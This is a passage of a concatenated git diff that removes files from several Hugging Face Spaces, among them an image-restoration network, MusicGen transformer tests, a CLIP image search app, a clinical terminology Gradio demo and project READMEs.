nn.Conv2d(in_channels, growth_rate, kernel_size=1) - - def forward(self, x): - res = self.identity(x) - x = self.layers(x) - x = self.lff(x) - return res + x - -##---------- testNet ---------- -class SRMNet_SWFF(nn.Module): - def __init__(self, in_chn=3, wf=96, depth=4): - super(SRMNet_SWFF, self).__init__() - self.depth = depth - self.down_path = nn.ModuleList() - self.bili_down = bili_resize(0.5) - self.conv_01 = nn.Conv2d(in_chn, wf, 3, 1, 1) - - # encoder of UNet-64 - prev_channels = 0 - for i in range(depth): # 0,1,2,3 - downsample = True if (i + 1) < depth else False - self.down_path.append(UNetConvBlock(prev_channels + wf, (2 ** i) * wf, downsample)) - prev_channels = (2 ** i) * wf - - # decoder of UNet-64 - self.up_path = nn.ModuleList() - self.skip_conv = nn.ModuleList() - self.conv_up = nn.ModuleList() - self.bottom_conv = nn.Conv2d(prev_channels, wf, 3, 1, 1) - self.bottom_up = bili_resize(2 ** (depth-1)) - - for i in reversed(range(depth - 1)): - self.up_path.append(UNetUpBlock(prev_channels, (2 ** i) * wf)) - self.skip_conv.append(nn.Conv2d((2 ** i) * wf, (2 ** i) * wf, 3, 1, 1)) - self.conv_up.append(nn.Sequential(*[bili_resize(2 ** i), nn.Conv2d((2 ** i) * wf, wf, 3, 1, 1)])) - # *[nn.Conv2d((2 ** i) * wf, wf, 3, 1, 1), bili_resize(2 ** i)]) - prev_channels = (2 ** i) * wf - - self.final_ff = SKFF(in_channels=wf, height=depth) - self.last = conv3x3(prev_channels, in_chn, bias=True) - - def forward(self, x): - img = x - scale_img = img - - ##### shallow conv ##### - x1 = self.conv_01(img) - encs = [] - ######## UNet-64 ######## - # Down-path (Encoder) - for i, down in enumerate(self.down_path): - if i == 0: # top layer - x1, x1_up = down(x1) - encs.append(x1_up) - elif (i + 1) < self.depth: # middle layer - scale_img = self.bili_down(scale_img) - left_bar = self.conv_01(scale_img) - x1 = torch.cat([x1, left_bar], dim=1) - x1, x1_up = down(x1) - encs.append(x1_up) - else: # lowest layer - scale_img = self.bili_down(scale_img) - left_bar = self.conv_01(scale_img) - x1 = torch.cat([x1, left_bar], dim=1) - x1 = down(x1) - - # Up-path (Decoder) - ms_result = [self.bottom_up(self.bottom_conv(x1))] - for i, up in enumerate(self.up_path): - x1 = up(x1, self.skip_conv[i](encs[-i - 1])) - ms_result.append(self.conv_up[i](x1)) - - # Multi-scale selective feature fusion - msff_result = self.final_ff(ms_result) - - ##### Reconstruct ##### - out_1 = self.last(msff_result) + img - - return out_1 - -if __name__ == "__main__": - from thop import profile - input = torch.ones(1, 3, 256, 256, dtype=torch.float, requires_grad=False) - - model = SRMNet_SWFF(in_chn=3, wf=96, depth=4) - out = model(input) - flops, params = profile(model, inputs=(input,)) - - # RDBlayer = SK_RDB(in_channels=64, growth_rate=64, num_layers=3) - # print(RDBlayer) - # out = RDBlayer(input) - # flops, params = profile(RDBlayer, inputs=(input,)) - print('input shape:', input.shape) - print('parameters:', params/1e6) - print('flops', flops/1e9) - print('output shape', out.shape) diff --git a/spaces/AE-NV/sentiment-productreview/README.md b/spaces/AE-NV/sentiment-productreview/README.md deleted file mode 100644 index 5d340615915583c247a212317517849687cd6acd..0000000000000000000000000000000000000000 --- a/spaces/AE-NV/sentiment-productreview/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Sentiment Productreview -emoji: 😻 -colorFrom: yellow -colorTo: gray -sdk: gradio -sdk_version: 3.18.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py b/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py deleted file mode 100644 index 2bb79bfd58d535469f9b3c56b8a5fe254db5d8ba..0000000000000000000000000000000000000000 --- a/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py +++ /dev/null @@ -1,253 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import ( - StreamingMultiheadAttention, StreamingTransformer, set_efficient_attention_backend) - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) - tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - for backend in ['torch', 'xformers']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), ((y - y2).norm(), backend) - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. - for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - for backend in ['torch', 'xformers']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly the same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. - y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7), (y - y_ref).norm() / y_ref.norm() - - # Now let's check that streaming is working properly. - with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py b/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py deleted file mode 100644 index a6f2be6f046de45811d1d75a8275794c37ea2d09..0000000000000000000000000000000000000000 --- a/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py +++ /dev/null @@ -1,185 +0,0 @@ -from html import escape -import re -import streamlit as st -import pandas as pd, numpy as np -from transformers import CLIPProcessor, CLIPModel -from st_clickable_images import clickable_images - -@st.cache( - show_spinner=False, - hash_funcs={ - CLIPModel: lambda _: None, - CLIPProcessor: lambda _: None, - dict: lambda _: None, - }, -) -def load(): - model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14") - processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14") - df = {0: pd.read_csv("data.csv"), 1: pd.read_csv("data2.csv")} - embeddings = {0: np.load("embeddings.npy"), 1: np.load("embeddings2.npy")} - for k in [0, 1]: - embeddings[k] = embeddings[k] / np.linalg.norm( - embeddings[k], axis=1, keepdims=True - ) - return model, processor, df, embeddings - - -model, processor, df, embeddings = load() -source = {0: "\nSource: Unsplash", 1: "\nSource: The Movie Database (TMDB)"} - - -def compute_text_embeddings(list_of_strings): - inputs = processor(text=list_of_strings, return_tensors="pt", padding=True) - result = model.get_text_features(**inputs).detach().numpy() - return result / np.linalg.norm(result, axis=1, keepdims=True) - - -def image_search(query, corpus, n_results=24): - positive_embeddings = None - - def concatenate_embeddings(e1, e2): - if e1 is None: - return e2 - else: - return np.concatenate((e1, e2), axis=0) - - splitted_query = query.split("EXCLUDING ") - dot_product = 0 - k = 0 if corpus == "Unsplash" else 1 - if len(splitted_query[0]) > 0: - positive_queries = splitted_query[0].split(";") - for positive_query in positive_queries: - match = re.match(r"\[(Movies|Unsplash):(\d{1,5})\](.*)", positive_query) - if match: - corpus2, idx, remainder = match.groups() - idx, remainder = int(idx), remainder.strip() - k2 = 0 if corpus2 == "Unsplash" else 1 - positive_embeddings = concatenate_embeddings( - positive_embeddings, embeddings[k2][idx : idx + 1, :] - ) - if len(remainder) > 0: - positive_embeddings = concatenate_embeddings( - positive_embeddings, compute_text_embeddings([remainder]) - ) - else: - positive_embeddings = concatenate_embeddings( - positive_embeddings, compute_text_embeddings([positive_query]) - ) - dot_product = embeddings[k] @ positive_embeddings.T - dot_product = dot_product - np.median(dot_product, axis=0) - dot_product = dot_product / np.max(dot_product, axis=0, keepdims=True) - dot_product = np.min(dot_product, axis=1) - - if len(splitted_query) > 1: - negative_queries = (" ".join(splitted_query[1:])).split(";") - negative_embeddings = compute_text_embeddings(negative_queries) - dot_product2 = embeddings[k] @ negative_embeddings.T - dot_product2 = dot_product2 - np.median(dot_product2, axis=0) - dot_product2 = dot_product2 / np.max(dot_product2, axis=0, keepdims=True) - dot_product -= np.max(np.maximum(dot_product2, 0), axis=1) - - results = np.argsort(dot_product)[-1 : -n_results - 1 : -1] - return [ - ( - df[k].iloc[i]["path"], - df[k].iloc[i]["tooltip"] + source[k], - i, - ) - for i in results - ] - - -description = """ -# Semantic image search -**Enter your query and hit enter** -""" - -howto = """ -- Click image to find similar images -- Use "**;**" to combine multiple queries) -- Use "**EXCLUDING**", to exclude a query -""" - - -def main(): - st.markdown( - """ - """, - unsafe_allow_html=True, - ) - st.sidebar.markdown(description) - with st.sidebar.expander("Advanced use"): - st.markdown(howto) - - - st.sidebar.markdown(f"Unsplash has categories that match: backgrounds, photos, nature, iphone, etc") - st.sidebar.markdown(f"Unsplash images contain animals, apps, events, feelings, food, travel, nature, people, religion, sports, things, stock") - st.sidebar.markdown(f"Unsplash things include flag, tree, clock, money, tattoo, arrow, book, car, fireworks, ghost, health, kiss, dance, balloon, crown, eye, house, music, airplane, lighthouse, typewriter, toys") - st.sidebar.markdown(f"unsplash feelings include funny, heart, love, cool, congratulations, love, scary, cute, friendship, inspirational, hug, sad, cursed, beautiful, crazy, respect, transformation, peaceful, happy") - st.sidebar.markdown(f"unsplash people contain baby, life, women, family, girls, pregnancy, society, old people, musician, attractive, bohemian") - st.sidebar.markdown(f"imagenet queries include: photo of, photo of many, sculpture of, rendering of, graffiti of, tattoo of, embroidered, drawing of, plastic, black and white, painting, video game, doodle, origami, sketch, etc") - - - _, c, _ = st.columns((1, 3, 1)) - if "query" in st.session_state: - query = c.text_input("", value=st.session_state["query"]) - else: - - query = c.text_input("", value="lighthouse") - corpus = st.radio("", ["Unsplash"]) - #corpus = st.radio("", ["Unsplash", "Movies"]) - if len(query) > 0: - results = image_search(query, corpus) - clicked = clickable_images( - [result[0] for result in results], - titles=[result[1] for result in results], - div_style={ - "display": "flex", - "justify-content": "center", - "flex-wrap": "wrap", - }, - img_style={"margin": "2px", "height": "200px"}, - ) - if clicked >= 0: - change_query = False - if "last_clicked" not in st.session_state: - change_query = True - else: - if clicked != st.session_state["last_clicked"]: - change_query = True - if change_query: - st.session_state["query"] = f"[{corpus}:{results[clicked][2]}]" - st.experimental_rerun() - - -if __name__ == "__main__": - main() diff --git a/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py b/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py deleted file mode 100644 index 3a2a532354367b122f50cc6f70f4aca4c1e0ff38..0000000000000000000000000000000000000000 --- a/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py +++ /dev/null @@ -1,327 +0,0 @@ -import pandas_profiling as pp -import pandas as pd -import tensorflow as tf - -from datasets import load_dataset -from tensorflow.python.framework import tensor_shape - -#LOINC -datasetLOINC = load_dataset("awacke1/LOINC-CodeSet-Value-Description.csv", split="train") -#SNOMED: -datasetSNOMED = load_dataset("awacke1/SNOMED-CT-Code-Value-Semantic-Set.csv", split="train") -#eCQM: -dataseteCQM = load_dataset("awacke1/eCQM-Code-Value-Semantic-Set.csv", split="train") - -# map using autotokenizer -from transformers import AutoTokenizer -tokenizer = AutoTokenizer.from_pretrained("bert-base-cased") -dataset = datasetLOINC.map(lambda examples: tokenizer(examples["Description"]), batched=True) -JSONOBJ2=dataset[0] -print(JSONOBJ2) - -sw = datasetLOINC.filter(lambda example: example["Description"].startswith("Allergy")) -len(sw) -print(sw) -print(datasetLOINC) -print(datasetSNOMED) -print(dataseteCQM) - -# play with some dataset tools before the show: - -#print(start_with_ar["Description"]) - -#--- -#Main Stage - Begin! -#--- - -import os -import json -import numpy as np -import gradio as gr - -HF_TOKEN = os.environ.get("HF_TOKEN") -CHOICES = ["SNOMED", "LOINC", "CQM"] -JSONOBJ = """{"items":{"item":[{"id": "0001","type": null,"is_good": false,"ppu": 0.55,"batters":{"batter":[{ "id": "1001", "type": "Regular" },{ "id": "1002", "type": "Chocolate" },{ "id": "1003", "type": "Blueberry" },{ "id": "1004", "type": "Devil's Food" }]},"topping":[{ "id": "5001", "type": "None" },{ "id": "5002", "type": "Glazed" },{ "id": "5005", "type": "Sugar" },{ "id": "5007", "type": "Powdered Sugar" },{ "id": "5006", "type": "Chocolate with Sprinkles" },{ "id": "5003", "type": "Chocolate" },{ "id": "5004", "type": "Maple" }]}]}}""" - - -def profile_dataset(dataset=datasetSNOMED, username="awacke1", token=HF_TOKEN, dataset_name="awacke1/SNOMED-CT-Code-Value-Semantic-Set.csv"): - df = pd.read_csv(dataset.Description) - if len(df.columns) <= 15: - profile = pp.ProfileReport(df, title=f"{dataset_name} Report") - else: - profile = pp.ProfileReport(df, title=f"{dataset_name} Report", minimal = True) - - repo_url = create_repo(f"{username}/{dataset_name}", repo_type = "space", token = token, space_sdk = "static", private=False) - - profile.to_file("./index.html") - - upload_file(path_or_fileobj ="./index.html", path_in_repo = "index.html", repo_id =f"{username}/{dataset_name}", repo_type = "space", token=token) - readme = f"---\ntitle: {dataset_name}\nemoji: ✨\ncolorFrom: green\ncolorTo: red\nsdk: static\npinned: false\ntags:\n- dataset-report\n---" - with open("README.md", "w+") as f: - f.write(readme) - upload_file(path_or_fileobj ="./README.md", path_in_repo = "README.md", repo_id =f"{username}/{dataset_name}", repo_type = "space", token=token) - return f"Your dataset report will be ready at {repo_url}" - -#def lowercase_title(example): -# return {"Description": example[title].lower()} - -# demonstrate map function of dataset -#JSONOBJ_MAP=datasetLOINC.map(lowercase_title) -#JSONOBJ_MAP=datasetLOINC.filter(lambda example: example["Description"].startswith("Mental health")) - - - - -def concatenate_text(examples): - return { - "text": examples["Code"] - + " \n " - + examples["Description"] - + " \n " - + examples["Purpose: Clinical Focus"] - } - -def cls_pooling(model_output): - return model_output.last_hidden_state[:, 0] - -def get_embeddings(text_list): - encoded_input = tokenizer( - text_list, padding=True, truncation=True, return_tensors="tf" - ) - encoded_input = {k: v for k, v in encoded_input.items()} - model_output = model(**encoded_input) - return cls_pooling(model_output) - - -def fn( text1, text2, num, slider1, slider2, single_checkbox, checkboxes, radio, dropdown, im1, im2, im3, im4, - video, audio1, audio2, file, df1, df2,): -#def fn( text1, text2, single_checkbox, checkboxes, radio, im4, file, df1, df2,): - - searchTerm = text1 - searchTermSentence = text2 - - start_with_searchTermLOINC = datasetLOINC.filter(lambda example:example["Description"].startswith('Allergy')) #Allergy - - - # FAISS - columns = start_with_searchTermLOINC.column_names - columns_to_keep = ["Value Set Name", "Code", "Description", "Purpose: Clinical Focus", "Code System OID"] - columns_to_remove = set(columns_to_keep).symmetric_difference(columns) - start_with_searchTermLOINC = start_with_searchTermLOINC.remove_columns(columns_to_remove) - start_with_searchTermLOINC - start_with_searchTermLOINC.set_format("pandas") - df = start_with_searchTermLOINC[:] - - df["Purpose: Clinical Focus"][0] - - df4 = df.explode("Purpose: Clinical Focus", ignore_index=True) - df4.head(4) - - from datasets import Dataset - clinical_dataset = Dataset.from_pandas(df4) - clinical_dataset - - clinical_dataset = clinical_dataset.map(lambda x: {"c_length": len(x["Description"].split())}) - - clinical_dataset = clinical_dataset.filter(lambda x: x["c_length"] > 15) - clinical_dataset - - - clinical_dataset = clinical_dataset.map(concatenate_text) - #embedding = get_embeddings(clinical_dataset["text"][0]) - #embedding.shape - - from transformers import AutoTokenizer, TFAutoModel - - model_ckpt = "sentence-transformers/multi-qa-mpnet-base-dot-v1" - tokenizer = AutoTokenizer.from_pretrained(model_ckpt) - model = TFAutoModel.from_pretrained(model_ckpt, from_pt=True) - -# TensorShape([1, 768]) - tf.shape([1, 768]) - - embeddings_dataset = clinical_dataset.map( - lambda x: {"embeddings": get_embeddings(x["text"]).numpy()[0]}) - -# embeddings_dataset.add_faiss_index(column="embeddings") - -# question = "How can I load a dataset offline?" -# question_embedding = get_embeddings([question]).numpy() -# question_embedding.shape - -# scores, samples = embeddings_dataset.get_nearest_examples("embeddings", question_embedding, k=5) - -# import pandas as pd - -# samples_df = pd.DataFrame.from_dict(samples) -# samples_df["scores"] = scores -# samples_df.sort_values("scores", ascending=False, inplace=True) - - - # "text": examples["Code"] - # + " \n " - # + examples["Description"] - # + " \n " - # + examples["Purpose: Clinical Focus"] - - -# for _, row in samples_df.iterrows(): -# print(f"Code: {row.Code}") -# print(f"Description: {row.Description}") -# #print(f"Purpose: Clinical Focus: {row.Purpose: Clinical Focus}") -# #print(f"URL: {row.html_url}") -# print("=" * 50) -# print() - - # SNOMED and CQM --------------- - start_with_searchTermSNOMED = datasetSNOMED.filter(lambda example: example["Description"].startswith('Hospital')) #Hospital - start_with_searchTermCQM = dataseteCQM.filter(lambda example: example["Description"].startswith('Telephone')) #Telephone - - print(start_with_searchTermLOINC ) - print(start_with_searchTermSNOMED ) - print(start_with_searchTermCQM) - - #print(start_with_searchTermLOINC["train"][0] ) - #print(start_with_searchTermSNOMED["train"][0] ) - #print(start_with_searchTermCQM["train"][0] ) - - #returnMsg=profile_dataset() - #print(returnMsg) - -# try: - #top1matchLOINC = json.loads(start_with_searchTermLOINC['train']) - #top1matchSNOMED = json.loads(start_with_searchTermSNOMED['train']) - #top1matchCQM = json.loads(start_with_searchTermCQM['train']) -# top1matchLOINC = json.loads(start_with_searchTermLOINC) -# top1matchSNOMED = json.loads(start_with_searchTermSNOMED) -# top1matchCQM = json.loads(start_with_searchTermCQM) -# except: -# print('Hello') - #print(start_with_searchTermLOINC[0]) - #print(start_with_searchTermSNOMED[0] ) - #print(start_with_searchTermCQM[0] ) - - #print(returnMsg) - # print("Datasets Processed") - - return ( - (text1 if single_checkbox else text2) - + ", selected:" - + ", ".join(checkboxes), # Text - { - "positive": num / (num + slider1 + slider2), - "negative": slider1 / (num + slider1 + slider2), - "neutral": slider2 / (num + slider1 + slider2), - }, # Label - (audio1[0], np.flipud(audio1[1])) - if audio1 is not None else os.path.join(os.path.dirname(__file__), "files/cantina.wav"), # Audio - np.flipud(im1) - if im1 is not None else os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), # Image - video - if video is not None else os.path.join(os.path.dirname(__file__), "files/world.mp4"), # Video - [ - ("The", "art"), - ("quick brown", "adj"), - ("fox", "nn"), - ("jumped", "vrb"), - ("testing testing testing", None), - ("over", "prp"), - ("the", "art"), - ("testing", None), - ("lazy", "adj"), - ("dogs", "nn"), - (".", "punc"), - ] + [(f"test {x}", f"test {x}") for x in range(10)], # HighlightedText - [ - ("The testing testing testing", None), - ("over", 0.6), - ("the", 0.2), - ("testing", None), - ("lazy", -0.1), - ("dogs", 0.4), - (".", 0), - ] + [(f"test", x / 10) for x in range(-10, 10)], # HighlightedText - #json.loads(JSONOBJ), # JSON - start_with_searchTermLOINC.to_json(orient="records", path_or_buf="None"), - #json.dumps(json.loads(start_with_searchTermLOINC['train'].to_json(orient="records", path_or_buf="None"))), - "", # HTML - os.path.join(os.path.dirname(__file__), "files/titanic.csv"), - df1, # Dataframe - np.random.randint(0, 10, (4, 4)), # Dataframe - df2, # Timeseries - ) - - - -demo = gr.Interface( - fn, - inputs=[ - gr.Textbox(value="Allergy", label="Textbox"), - gr.Textbox(lines=3, value="Bathing", placeholder="Type here..", label="Textbox 2"), - gr.Number(label="Number", value=42), - gr.Slider(10, 20, value=15, label="Slider: 10 - 20"), - gr.Slider(maximum=20, step=0.04, label="Slider: step @ 0.04"), - gr.Checkbox(label="Check for NER Match on Submit"), - gr.CheckboxGroup(label="Clinical Terminology to Check", choices=CHOICES, value=CHOICES[0:2]), - gr.Radio(label="Preferred Terminology Output", choices=CHOICES, value=CHOICES[2]), - gr.Dropdown(label="Dropdown", choices=CHOICES), - gr.Image(label="Image"), - gr.Image(label="Image w/ Cropper", tool="select"), - gr.Image(label="Sketchpad", source="canvas"), - gr.Image(label="Webcam", source="webcam"), - gr.Video(label="Video"), - gr.Audio(label="Audio"), - gr.Audio(label="Microphone", source="microphone"), - gr.File(label="File"), - gr.Dataframe(label="Filters", headers=["Name", "Age", "Gender"]), - gr.Timeseries(x="time", y=["price", "value"], colors=["pink", "purple"]), - ], - outputs=[ - gr.Textbox(label="Textbox"), - gr.Label(label="Label"), - gr.Audio(label="Audio"), - gr.Image(label="Image"), - gr.Video(label="Video"), - gr.HighlightedText(label="HighlightedText", color_map={"punc": "pink", "test 0": "blue"}), - gr.HighlightedText(label="HighlightedText", show_legend=True), - gr.JSON(label="JSON"), - gr.HTML(label="HTML"), - gr.File(label="File"), - gr.Dataframe(label="Dataframe"), - gr.Dataframe(label="Numpy"), - gr.Timeseries(x="time", y=["price", "value"], label="Timeseries"), - ], - examples=[ - [ - "Allergy", - "Admission", - 10, - 12, - 4, - True, - ["SNOMED", "LOINC", "CQM"], - "SNOMED", - "bar", - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/world.mp4"), - os.path.join(os.path.dirname(__file__), "files/cantina.wav"), - os.path.join(os.path.dirname(__file__), "files/cantina.wav"), - os.path.join(os.path.dirname(__file__), "files/titanic.csv"), - [[1, 2, 3], [3, 4, 5]], - os.path.join(os.path.dirname(__file__), "files/time.csv"), - ] - ] - * 3, - theme="default", - title="⚗️🧠🔬🧬 Clinical Terminology Auto Mapper AI 👩‍⚕️🩺⚕️🙋", - cache_examples=False, - description="Clinical Terminology Auto Mapper AI", - article="Learn more at [Yggdrasil](https://github.com/AaronCWacker/Yggdrasil)", -# live=True, -) - -if __name__ == "__main__": - demo.launch(debug=True) \ No newline at end of file diff --git a/spaces/AbandonedMuse/UnlimitedMusicGen/README.md b/spaces/AbandonedMuse/UnlimitedMusicGen/README.md deleted file mode 100644 index 6734acc69a56783d44247195e30dd926376db6d3..0000000000000000000000000000000000000000 --- a/spaces/AbandonedMuse/UnlimitedMusicGen/README.md +++ /dev/null @@ -1,210 +0,0 @@ ---- -title: UnlimitedMusicGen -emoji: 🎼 -colorFrom: white -colorTo: red -sdk: gradio -sdk_version: 3.38.0 -app_file: app.py -pinned: false -license: creativeml-openrail-m -tags: -- musicgen -- unlimited -duplicated_from: Surn/UnlimitedMusicGen ---- - -[arxiv]: https://arxiv.org/abs/2306.05284 -[musicgen_samples]: https://ai.honu.io/papers/musicgen/ -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - -# UnlimitedMusicGen -This is my modification of the Audiocraft project to enable unlimited Audio generation. I have added a few features to the original project to enable this. I have also added a few features to the gradio interface to make it easier to use. - -# Audiocraft -![docs badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_docs/badge.svg) -![linter badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_linter/badge.svg) -![tests badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_tests/badge.svg) - -Audiocraft is a PyTorch library for deep learning research on audio generation. At the moment, it contains the code for MusicGen, a state-of-the-art controllable text-to-music model. - -## MusicGen - -Audiocraft provides the code and models for MusicGen, [a simple and controllable model for music generation][arxiv]. MusicGen is a single stage auto-regressive -Transformer model trained over a 32kHz EnCodec tokenizer with 4 codebooks sampled at 50 Hz. Unlike existing methods like [MusicLM](https://arxiv.org/abs/2301.11325), MusicGen doesn't require a self-supervised semantic representation, and it generates -all 4 codebooks in one pass. By introducing a small delay between the codebooks, we show we can predict -them in parallel, thus having only 50 auto-regressive steps per second of audio. -Check out our [sample 